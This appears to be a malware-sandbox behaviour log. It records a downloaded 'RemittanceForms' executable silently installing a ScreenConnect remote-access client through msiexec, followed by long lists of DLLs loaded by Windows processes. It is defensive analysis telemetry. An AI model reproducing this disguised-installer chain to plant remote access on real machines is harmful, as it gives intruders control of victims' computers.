                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=1092 --field-trial-handle=1972,i,9532732200185149555,16530467832849214428,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                      Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 658C20DC4570CE36B0E2CFA7882ABE33 E Global\MSI0000
                      Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 8C89C74C56A8241057E69ABE1029F40F C
                      Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding C1CF189F56AA756A7464B123F5466459
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeProcess created: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exe "C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exe" "RunRole" "d631616b-045d-46ad-b654-67b074b7884f" "User"
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Users\user\Downloads\RemittanceForms (1).exe "C:\Users\user\Downloads\RemittanceForms (1).exe"
                      Source: C:\Users\user\Downloads\RemittanceForms (1).exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\ScreenConnect\24.3.7.9067\484f9eed1d8e13b9\ScreenConnect.ClientSetup.msi"
                      Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 85D94624DDB7360BF8B7EA65934AC6CF C
                      Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\AppData\Local\Temp\MSI8F57.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_6393796 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
                      Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding FAAB4D8D67AEAB9EA3FB9C311B04B13B
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
                      Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=1092 --field-trial-handle=1972,i,9532732200185149555,16530467832849214428,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Users\user\Downloads\RemittanceForms (1).exe "C:\Users\user\Downloads\RemittanceForms (1).exe"
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
                      Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 85D94624DDB7360BF8B7EA65934AC6CF C
                      Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding FAAB4D8D67AEAB9EA3FB9C311B04B13B
                      Source: C:\Users\user\Downloads\RemittanceForms (1).exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\ScreenConnect\24.3.7.9067\484f9eed1d8e13b9\ScreenConnect.ClientSetup.msi"
                      Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\AppData\Local\Temp\MSI8F57.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_6393796 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
                      Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: apphelp.dll
                      Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: c2r64.dll
                      Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: userenv.dll
                      Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: msasn1.dll
                      Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: kernel.appcore.dll
                      Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: cryptsp.dll
                      Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: rsaenh.dll
                      Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: cryptbase.dll
                      Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: gpapi.dll
                      Source: C:\Users\user\Downloads\RemittanceForms.exeSection loaded: mscoree.dll
                      Source: C:\Users\user\Downloads\RemittanceForms.exeSection loaded: kernel.appcore.dll
                      Source: C:\Users\user\Downloads\RemittanceForms.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Users\user\Downloads\RemittanceForms.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\Downloads\RemittanceForms.exeSection loaded: wldp.dll
                      Source: C:\Users\user\Downloads\RemittanceForms.exeSection loaded: amsi.dll
                      Source: C:\Users\user\Downloads\RemittanceForms.exeSection loaded: userenv.dll
                      Source: C:\Users\user\Downloads\RemittanceForms.exeSection loaded: profapi.dll
                      Source: C:\Users\user\Downloads\RemittanceForms.exeSection loaded: version.dll
                      Source: C:\Users\user\Downloads\RemittanceForms.exeSection loaded: msasn1.dll
                      Source: C:\Users\user\Downloads\RemittanceForms.exeSection loaded: gpapi.dll
                      Source: C:\Users\user\Downloads\RemittanceForms.exeSection loaded: cryptsp.dll
                      Source: C:\Users\user\Downloads\RemittanceForms.exeSection loaded: rsaenh.dll
                      Source: C:\Users\user\Downloads\RemittanceForms.exeSection loaded: cryptbase.dll
                      Source: C:\Users\user\Downloads\RemittanceForms.exeSection loaded: uxtheme.dll
                      Source: C:\Users\user\Downloads\RemittanceForms.exeSection loaded: windows.storage.dll
                      Source: C:\Users\user\Downloads\RemittanceForms.exeSection loaded: propsys.dll
                      Source: C:\Users\user\Downloads\RemittanceForms.exeSection loaded: edputil.dll
                      Source: C:\Users\user\Downloads\RemittanceForms.exeSection loaded: urlmon.dll
                      Source: C:\Users\user\Downloads\RemittanceForms.exeSection loaded: iertutil.dll
                      Source: C:\Users\user\Downloads\RemittanceForms.exeSection loaded: srvcli.dll
                      Source: C:\Users\user\Downloads\RemittanceForms.exeSection loaded: netutils.dll
                      Source: C:\Users\user\Downloads\RemittanceForms.exeSection loaded: windows.staterepositoryps.dll
                      Source: C:\Users\user\Downloads\RemittanceForms.exeSection loaded: sspicli.dll
                      Source: C:\Users\user\Downloads\RemittanceForms.exeSection loaded: wintypes.dll
                      Source: C:\Users\user\Downloads\RemittanceForms.exeSection loaded: appresolver.dll
                      Source: C:\Users\user\Downloads\RemittanceForms.exeSection loaded: bcp47langs.dll
                      Source: C:\Users\user\Downloads\RemittanceForms.exeSection loaded: slc.dll
                      Source: C:\Users\user\Downloads\RemittanceForms.exeSection loaded: sppc.dll
                      Source: C:\Users\user\Downloads\RemittanceForms.exeSection loaded: onecorecommonproxystub.dll
                      Source: C:\Users\user\Downloads\RemittanceForms.exeSection loaded: onecoreuapcommonproxystub.dll
                      Source: C:\Users\user\Downloads\RemittanceForms.exeSection loaded: apphelp.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: srpapi.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: tsappcmp.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: uxtheme.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: textinputframework.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coreuicomponents.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coremessaging.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntmarta.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: propsys.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: textshaping.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wkscli.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mscoree.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msihnd.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: pcacli.dll
                      Source: C:\Windows\System32\msiexec.exeSection loaded: apphelp.dll
                      Source: C:\Windows\System32\msiexec.exeSection loaded: aclayers.dll
                      Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dll
                      Source: C:\Windows\System32\msiexec.exeSection loaded: sfc_os.dll
                      Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\msiexec.exeSection loaded: msi.dll
                      Source: C:\Windows\System32\msiexec.exeSection loaded: tsappcmp.dll
                      Source: C:\Windows\System32\msiexec.exeSection loaded: userenv.dll
                      Source: C:\Windows\System32\msiexec.exeSection loaded: profapi.dll
                      Source: C:\Windows\System32\msiexec.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\msiexec.exeSection loaded: netapi32.dll
                      Source: C:\Windows\System32\msiexec.exeSection loaded: wkscli.dll
                      Source: C:\Windows\System32\msiexec.exeSection loaded: netutils.dll
                      Source: C:\Windows\System32\msiexec.exeSection loaded: srclient.dll
                      Source: C:\Windows\System32\msiexec.exeSection loaded: spp.dll
                      Source: C:\Windows\System32\msiexec.exeSection loaded: powrprof.dll
                      Source: C:\Windows\System32\msiexec.exeSection loaded: vssapi.dll
                      Source: C:\Windows\System32\msiexec.exeSection loaded: vsstrace.dll
                      Source: C:\Windows\System32\msiexec.exeSection loaded: umpdc.dll
                      Source: C:\Windows\System32\msiexec.exeSection loaded: wldp.dll
                      Source: C:\Windows\System32\msiexec.exeSection loaded: mscoree.dll
                      Source: C:\Windows\System32\msiexec.exeSection loaded: version.dll
                      Source: C:\Windows\System32\msiexec.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Windows\System32\msiexec.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\System32\msiexec.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\System32\msiexec.exeSection loaded: rstrtmgr.dll
                      Source: C:\Windows\System32\msiexec.exeSection loaded: ncrypt.dll
                      Source: C:\Windows\System32\msiexec.exeSection loaded: ntasn1.dll
                      Source: C:\Windows\System32\msiexec.exeSection loaded: windows.storage.dll
                      Source: C:\Windows\System32\msiexec.exeSection loaded: pcacli.dll
                      Source: C:\Windows\System32\msiexec.exeSection loaded: mpr.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cabinet.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: esent.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: mi.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: webio.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: es.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: wlidsvc.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: clipc.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: windows.storage.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msxml6.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: wtsapi32.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: winsta.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: gamestreamingext.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msauserext.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: tbs.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: webio.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: cryptnet.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: elscore.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: elstrans.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: cryptngc.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: devobj.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: moshost.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: mapsbtsvc.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: mosstorage.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: ztrace_maps.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: ztrace_maps.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: ztrace_maps.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: bcp47langs.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: mapconfiguration.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: windows.storage.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: aphostservice.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: networkhelper.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: userdataplatformhelperutil.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: mccspal.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: syncutil.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: syncutil.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: vaultcli.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: dmcfgutils.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: wintypes.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: dmcmnutils.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: dmxmlhelputils.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: inproclogger.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: windows.networking.connectivity.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: synccontroller.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: pimstore.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: aphostclient.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: accountaccessor.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: dsclient.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: systemeventsbrokerclient.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: userdatalanguageutil.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: mccsengineshared.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: pimstore.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: cemapi.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: userdatatypehelperutil.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: phoneutil.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: storsvc.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: devobj.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: fltlib.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: bcd.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: wer.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: cabinet.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: windows.storage.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: storageusage.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dll
                      Source: C:\Windows\System32\msiexec.exeSection loaded: cabinet.dll
                      Source: C:\Windows\System32\msiexec.exeSection loaded: mscoree.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dll
